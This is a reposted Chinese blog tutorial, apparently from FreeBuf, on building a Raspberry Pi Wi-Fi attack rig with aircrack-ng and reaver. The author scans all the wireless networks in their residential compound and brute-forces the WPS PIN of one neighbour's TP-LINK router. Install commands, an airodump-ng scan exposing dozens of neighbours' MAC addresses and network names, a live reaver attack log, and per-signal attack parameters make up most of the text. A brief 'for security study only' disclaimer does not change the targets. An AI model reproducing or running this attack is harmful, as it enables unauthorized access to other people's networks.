Raspberry Pi下跑aircrack和reaver破解路由器PIN碼
在freebuf看到很多好文章,各類轉載,留着之後用
小編:感謝minyoni的分享,freebuf但願這種從安裝到安全測試全過程的paper愈來愈多,讓國內安全paper與國外同樣細緻和專業。 聲明:本文僅供安全學習用途 最近心血來潮,想把小區裏的無線信號測試個遍。基於目前大多數路由器都支持wps,想必各位基友們都知道aircrack和reaver這 兩個工具,實屬破解pin碼,殺人越貨,居家旅行之必備良藥。像之前跑reaver這樣的暴力工具通常都要24小時開着主機,實在浪費功耗,灰常的不綠 色!不環保! 話說Raspberry Pi,做爲一個攻擊環境也是灰常給力的。國外的發燒友們已經針對這個板子,改造了專門用於網絡攻擊和測試的系統(基於debian)
不過今天這篇文章說的是如何在Raspberry Pi的官方發行版上安裝 aircrack和reaver ,我用的是蘋果充電器+Mini usb 數據線給Raspberry Pi供電,帶一個alfa的無線網卡足夠了。功耗如此之低,實在是在線跑pin碼。長期無線抓包的絕佳方案呢。 PS:懂得能夠路過了……
廢話很少說,安裝過程以下 1.準備系統環境
apt-get install -y libpcap-dev libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tshark subversion2.安裝aircrack
svn co http://svn.aircrack-ng.org/trunk/ aircrack-ng cd aircrack-ng/ make make install cd ../3.安裝reaver
wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz tar zxvf reaver-1.4.tar.gz cd reaver-1.4/src ./configure make make install cd ../4.使用 aircrack,尋找附近開啓wps的路由器,邪惡……嘻嘻
airmon-ng start wlan0 airodump-ng mon0
CH 11 ][ Elapsed: 36 s ][ 2012-12-18 04:46 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:0E:2E:FD:C4:BB -1 0 0 0 -1 -1 <length: 0> 4C:E6:76:60:3F:20 -13 123 0 0 11 54e WPA2 CCMP PSK cuier-1 B0:48:7A:52:F4:72 -23 42 0 0 1 54e. WPA2 CCMP PSK FAST_52F472 8C:21:0A:5F:A2:FA -35 28 0 0 1 54e. WPA2 CCMP PSK TP-LINK_5FA2FA E0:05:C5:D3:3F:00 -42 33 0 0 2 54e. WPA2 CCMP PSK TP-LINK_D33F00 EC:17:2F:7D:12:1E -49 56 1 0 6 54e. WPA2 CCMP PSK wg7788 B0:48:7A:5D:22:EA -51 36 0 0 6 54e. WPA2 CCMP PSK TP-LINK_1202 C4:CA:D9:6D:6F:B0 -52 30 10 0 11 54e. OPN ChinaNet 8C:21:0A:8F:2F:1A -54 18 0 0 1 54e. WPA2 CCMP PSK hechengyv E0:05:C5:C5:70:E8 -55 15 0 0 4 54e. WPA2 CCMP PSK wtangqiu C8:3A:35:55:D1:D8 -55 20 2 0 7 54e. WPA CCMP PSK Tenda_55D1D8 8C:21:0A:84:89:8C -56 24 0 0 1 54e. WPA2 CCMP PSK BATE C4:CA:D9:6D:5F:60 -55 15 2 0 6 54e. OPN ChinaNet EC:17:2F:54:01:2E -56 13 0 0 1 54e. WPA2 CCMP PSK diguadawang 5C:63:BF:74:56:52 -53 18 2 0 1 54e. WPA2 CCMP PSK cocohe 08:10:76:40:C2:92 -58 21 0 0 1 54e WPA2 CCMP PSK flytv E0:05:C5:C0:60:42 -56 21 0 0 9 54e. WPA2 CCMP PSK HZLYL 38:83:45:C1:BE:F8 -59 14 1 0 6 54e. WPA2 CCMP PSK TICO081122 C4:CA:D9:74:B3:80 -57 13 1 0 11 54e. OPN ChinaNet EC:88:8F:AB:F6:5E -59 5 0 0 4 54e. WPA2 CCMP PSK TP-LINK_ABF65E 6C:E8:73:B0:67:78 -59 8 0 0 6 54e. WPA2 CCMP PSK WJJ~LOVE~WW C8:3A:35:19:D6:78 -61 9 0 0 1 54e WPA CCMP PSK Tenda_19D678 E0:05:C5:19:9C:04 -61 18 0 0 7 54 . WPA2 CCMP PSK 1-14-1-602 C8:64:C7:5A:46:16 -60 3 0 0 11 54e WPA CCMP PSK STB_CDCF 6C:E8:73:45:A7:E6 -60 6 0 0 4 54e. WPA2 CCMP PSK TP-LINK_45A7E6 1C:BD:B9:F5:E5:D7 -61 16 0 0 1 54 WPA2 CCMP PSK D-Link_DIR-600M C4:CA:D9:6D:6E:B0 -61 12 0 0 1 54e. OPN ChinaNet C8:64:C7:5A:46:15 -61 17 0 0 11 54e WPA CCMP PSK VIDEOPHONE_CDCF C8:64:C7:5A:46:17 -61 12 0 0 11 54e WPA CCMP PSK BACKUP EC:88:8F:99:75:F2 -61 5 0 0 4 54e. WPA2 CCMP PSK 6786 8C:21:0A:1E:60:26 -61 3 0 0 1 54e. WPA2 CCMP PSK yue 00:23:CD:5B:A7:9E -61 2 0 0 6 54 . WEP WEP 1203 wireless 14:E6:E4:44:9B:8E -62 6 0 0 4 54e. WPA2 CCMP PSK bujiankai 00:1D:0F:81:72:06 -62 4 0 0 6 54 . WEP WEP Line FC:C8:97:94:B6:C8 -62 7 0 0 11 54e WPA CCMP PSK CU_6cmn B0:48:7A:2A:1B:E6 -62 7 0 0 6 54e. WPA CCMP PSK 302 EC:88:8F:8F:CD:BB -62 11 0 0 11 54e. WPA2 CCMP PSK haloso2 EC:17:2F:AC:44:A2 -62 7 0 0 1 54e. WPA2 CCMP PSK 1-401 C8:64:C7:5A:46:14 -63 24 0 0 11 54e WPA CCMP PSK CU_CDCF 38:83:45:B5:E3:96 -63 6 0 0 1 54e. WPA2 CCMP PSK TP-LINK_B5E396 C8:3A:35:2B:35:68 -63 11 0 0 11 54e WPA2 CCMP PSK Tenda_2B3568 00:27:19:6D:4A:5A -63 1 0 0 11 54e. WPA2 CCMP PSK JUJIA-FOGUANG FC:C8:97:94:B6:CB -65 9 0 0 11 54e WPA CCMP PSK BACKUP FC:C8:97:94:B6:C9 -63 15 0 0 11 54e WPA CCMP PSK VIDEOPHONE_6cmn C8:3A:35:06:63:B0 -64 3 0 0 1 54e WPA2 CCMP PSK Tenda_0663B0 8C:21:0A:B0:22:92 -64 3 0 0 1 54e. WPA2 CCMP PSK 810 14:E6:E4:4F:DE:FE -64 3 0 0 1 54e. WPA2 CCMP PSK YM+ZM FC:C8:97:94:B6:CA -65 13 0 0 11 54e WPA CCMP PSK STB_6cmn C8:3A:35:52:70:60 -65 2 0 0 11 54e. WPA CCMP PSK Tenda_527060 00:26:5A:B3:08:7E -65 8 0 0 13 54e WPA2 CCMP PSK 503 F4:EC:38:56:6B:DE -62 2 0 0 9 54e. WPA2 CCMP PSK WTO 14:D6:4D:A0:19:60 -62 3 0 0 11 54e WPA2 TKIP PSK wang~XB C4:CA:D9:6D:6F:40 -62 1 0 0 1 54e. OPN ChinaNet ctrl+c^ 結束話說小區裏的無線信號還真是多呢……主要是alfa 的卡給力……呵呵 5.使用reaver 破解開啓wps功能的路由器密碼 好比這條,信號還不錯
8C:21:0A:5F:A2:FA -35 28 0 0 1 54e. WPA2 CCMP PSK TP-LINK_5FA2FA root@home:~/soft/reaver-1.4# reaver -i mon0 -b 8C:21:0A:5F:A2:FA -a -S -vv -d2 -t 5 -c 1 Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> [+] Switching mon0 to channel 1 [+] Waiting for beacon from 8C:21:0A:5F:A2:FA [+] Associated with 8C:21:0A:5F:A2:FA (ESSID: TP-LINK_5FA2FA) [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK [+] Sending WSC NACK [+] Trying pin 00005678 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK [+] Sending WSC NACK [+] Trying pin 01235678 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK [+] Sending WSC NACK [+] Trying pin 11115670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message ^C 這樣就開始破解了哦,耐心等待結果就行了……不要太邪惡哦。作作測試仍是能夠的,要作個好童鞋……########################################################################## 附上reaver調整參數的一些小技巧 reaver:
-i 監聽後接口名稱 -b 目標mac地址 -a 自動檢測目標AP最佳配置 -S 使用最小的DH key(能夠提升PJ速度) -vv 顯示更多的非嚴重警告 -d 即delay每窮舉一次的閒置時間 預設爲1秒 -t 即timeout每次窮舉等待反饋的最長時間 -c指定頻道能夠方便找到信號,如-c1 指定1頻道,你們查看本身的目標頻道作相應修改 (非TP-LINK路由推薦–d9 –t9參數防止路由僵死 示例: reaver -i mon0 -b MAC -a -S –d9 –t9 -vv) 應因情況調整參數(-c後面都已目標頻道爲1做爲例子) 目標信號很是好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1 目標信號普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1 目標信號通常: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1
相關文章
- 1. reaver跑pin碼wpc文件的修改
- 2. 在BT5下破解WPS無線路由器的PIN碼和密碼
- 3. Raspberry Pi配置爲無線路由器
- 4. [轉]Raspberry Pi作成路由器
- 5. 用Raspberry Pi解救變磚的路由器
- 6. Raspberry Pi & Raspberry Pi 4
- 7. ubuntu 下 Aircrack 破解wifi密碼(wpa/wpa2)
- 8. Ubuntu下用aircrack破解WIFI密碼
- 9. raspberry pi 3b 無顯示器,無路由器安裝教程
- 10. aircrack-ng wifi密碼破解
- 更多相關文章...
- • MySQL下載步驟詳解 - MySQL教程
- • XML DOM 解析器 - XML DOM 教程
- • Docker容器實戰(七) - 容器眼光下的文件系統
- • 適用於PHP初學者的學習線路和建議
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
